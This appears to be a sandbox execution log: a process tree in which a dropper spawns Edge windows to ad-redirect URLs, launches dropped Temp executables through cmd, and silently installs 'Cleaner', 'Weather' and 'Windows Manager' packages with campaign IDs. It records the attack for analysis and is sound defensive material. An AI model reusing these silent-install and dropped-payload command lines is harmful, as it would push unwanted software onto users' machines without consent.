-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:85⤵PID:5664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:15⤵PID:5924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:15⤵PID:6068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:15⤵PID:1476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:15⤵PID:4004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:15⤵PID:4568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3948 /prefetch:85⤵PID:4068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3948 /prefetch:85⤵PID:6324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5536 /prefetch:25⤵PID:3888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1440 /prefetch:15⤵PID:5548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2248 /prefetch:15⤵PID:7512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:15⤵PID:2228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:15⤵PID:6524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:15⤵PID:4804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:15⤵PID:1520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:15⤵PID:1680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:15⤵PID:6284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:15⤵PID:1856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:15⤵PID:7752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:15⤵PID:2900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1104 /prefetch:15⤵PID:2352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:15⤵PID:6468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:15⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1364 /prefetch:15⤵PID:3660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5920 /prefetch:85⤵PID:6136
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:1604
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e0,0x1d8,0x1e4,0x1c8,0x1e8,0x7ffb4c8946f8,0x7ffb4c894708,0x7ffb4c8947185⤵PID:7596
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514834⤵PID:1248
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x12c,0x130,0x134,0xfc,0x138,0x7ffb4c8946f8,0x7ffb4c894708,0x7ffb4c8947185⤵PID:2584
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515134⤵PID:6560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4c8946f8,0x7ffb4c894708,0x7ffb4c8947185⤵PID:4376
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872154⤵PID:7940
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4c8946f8,0x7ffb4c894708,0x7ffb4c8947185⤵PID:2212
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631194⤵PID:2524
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4c8946f8,0x7ffb4c894708,0x7ffb4c8947185⤵PID:1164
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942314⤵PID:3832
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4c8946f8,0x7ffb4c894708,0x7ffb4c8947185⤵PID:7496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\36-a0944-345-e779b-e2f619c6c49bd\Nebotaexuva.exe"C:\Users\Admin\AppData\Local\Temp\36-a0944-345-e779b-e2f619c6c49bd\Nebotaexuva.exe"3⤵PID:2056
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahv223bd.x25\GcleanerEU.exe /eufive & exit4⤵PID:6016
-
C:\Users\Admin\AppData\Local\Temp\ahv223bd.x25\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ahv223bd.x25\GcleanerEU.exe /eufive5⤵PID:6460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6460 -s 2886⤵
- Program crash
PID:7300
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vcb15nru.xhv\installer.exe /qn CAMPAIGN="654" & exit4⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5476 -
C:\Users\Admin\AppData\Local\Temp\vcb15nru.xhv\installer.exeC:\Users\Admin\AppData\Local\Temp\vcb15nru.xhv\installer.exe /qn CAMPAIGN="654"5⤵PID:7240
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vcb15nru.xhv\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vcb15nru.xhv\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318565 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵PID:7432
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\js2fmhs0.hne\ufgaa.exe & exit4⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y42rr1zp.wo5\anyname.exe & exit4⤵PID:8128
-
C:\Users\Admin\AppData\Local\Temp\y42rr1zp.wo5\anyname.exeC:\Users\Admin\AppData\Local\Temp\y42rr1zp.wo5\anyname.exe5⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\y42rr1zp.wo5\anyname.exe"C:\Users\Admin\AppData\Local\Temp\y42rr1zp.wo5\anyname.exe" -q6⤵PID:6220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6220 -s 7727⤵
- Program crash
PID:3532
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dg22cfyu.jn2\gcleaner.exe /mixfive & exit4⤵PID:6064
-
C:\Users\Admin\AppData\Local\Temp\dg22cfyu.jn2\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\dg22cfyu.jn2\gcleaner.exe /mixfive5⤵PID:1976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 2926⤵
- Program crash
PID:7724
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\arot2txp.ltq\autosubplayer.exe /S & exit4⤵PID:7280
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 2921⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2740
-
C:\Users\Admin\AppData\Local\Temp\is-RTSFQ.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-RTSFQ.tmp\WEATHER Manager.tmp" /SL5="$102D2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\is-4A4A9.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4A4A9.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7152⤵PID:6268
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4A4A9.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4A4A9.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629318565 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"3⤵PID:7192
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 1556 -ip 15561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5132 -ip 51321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6120
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:5744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1128 -ip 11281⤵PID:5776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5584 -ip 55841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4512
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
PID:5660 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 63E36363024499083CAE1BF510D2A365 C2⤵
- Loads dropped DLL
PID:4600
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 74EBD153980EFBED91BAE51902BF64AD C2⤵PID:6940
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D41B8FBA4FDD1CFB24222331F12512FA2⤵PID:7596
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 87CB77B87B3CE8302F38A539EE1D6DD0 C2⤵PID:720
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C302A5DA4A5A29AA035CAD946B5263F0 C2⤵PID:8092
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵PID:6400
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵PID:8156
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:3328
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffb62a7dec0,0x7ffb62a7ded0,0x7ffb62a7dee05⤵PID:1148
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1604 /prefetch:25⤵PID:1544
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --mojo-platform-channel-handle=2252 /prefetch:85⤵PID:2280
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --mojo-platform-channel-handle=2208 /prefetch:85⤵PID:700
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2504 /prefetch:15⤵PID:1948
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2528 /prefetch:15⤵PID:5468
-
-
